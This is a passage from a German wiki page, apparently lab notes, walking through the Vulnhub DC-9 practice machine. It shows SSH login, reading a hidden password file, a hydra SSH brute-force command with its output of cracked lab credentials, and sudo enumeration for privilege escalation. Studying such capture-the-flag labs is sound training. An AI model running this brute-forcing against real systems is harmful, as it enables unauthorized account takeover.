Vulnhub dc-9 Einloggen und gucken: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 76: | Zeile 76: | ||
fredf@dc-9:~$ | fredf@dc-9:~$ | ||
fredf@dc-9:~$ | fredf@dc-9:~$ | ||
| + | =Darf fredf ein Program als root ausführen?= | ||
| + | *sudo -l | ||
| + | Matching Defaults entries for fredf on dc-9: | ||
| + | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin | ||
| + | |||
| + | User fredf may run the following commands on dc-9: | ||
| + | (root) NOPASSWD: /opt/devstuff/dist/test/test | ||
=welche Kernelversion läuft?= | =welche Kernelversion läuft?= | ||
*uname -a | *uname -a | ||
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux | Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux | ||
Version vom 9. März 2023, 10:27 Uhr
Einloggen
- ssh janitor@10.0.10.58 255 ⨯
janitor@10.0.10.58's password: Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Mar 9 19:57:31 2023 from 10.0.10.101
- ls -la
total 16 drwx------ 4 janitor janitor 4096 Mar 9 19:57 . drwxr-xr-x 19 root root 4096 Dec 29 2019 .. lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null drwx------ 3 janitor janitor 4096 Mar 9 19:57 .gnupg drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
Was ist in diesem Verzeichnis?
cat .secrets-for-putin/passwords-found-on-post-it-notes.txt
BamBam01 Passw0rd smellycats P0Lic#10-4 B4-Tru3-001 4uGU5T-NiGHts
Wir erweiteren unsere pass.txt
password 3kfs86sfd 468sfdfsd2 4sfd87sfd1 RocksOff TC&TheBoyz B8m#48sd Pebbles BamBam01 UrAG0D! Passw0rd yN72#dsd ILoveRachel 3248dsds7s smellycats YR3BVxxxw87 Ilovepeepee Hawaii-Five-0 BamBam01 Passw0rd smellycats P0Lic#10-4 B4-Tru3-001 4uGU5T-NiGHts
Erneuter Test
- hydra -L users.txt -P pass.txt 10.0.10.58 ssh 130 ⨯
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-09 11:23:03 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 551 login tries (l:19/p:29), ~35 tries per task [DATA] attacking ssh://10.0.10.58:22/ [22][ssh] host: 10.0.10.58 login: fredf password: B4-Tru3-001 [22][ssh] host: 10.0.10.58 login: chandlerb password: UrAG0D! [22][ssh] host: 10.0.10.58 login: joeyt password: Passw0rd [22][ssh] host: 10.0.10.58 login: janitor password: Ilovepeepee 1 of 1 target successfully completed, 4 valid passwords found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-09 11:24:56
Wir werden fredf
janitor@dc-9:~$ su - fredf Password: fredf@dc-9:~$ fredf@dc-9:~$
Darf fredf ein Program als root ausführen?
- sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
welche Kernelversion läuft?
- uname -a
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux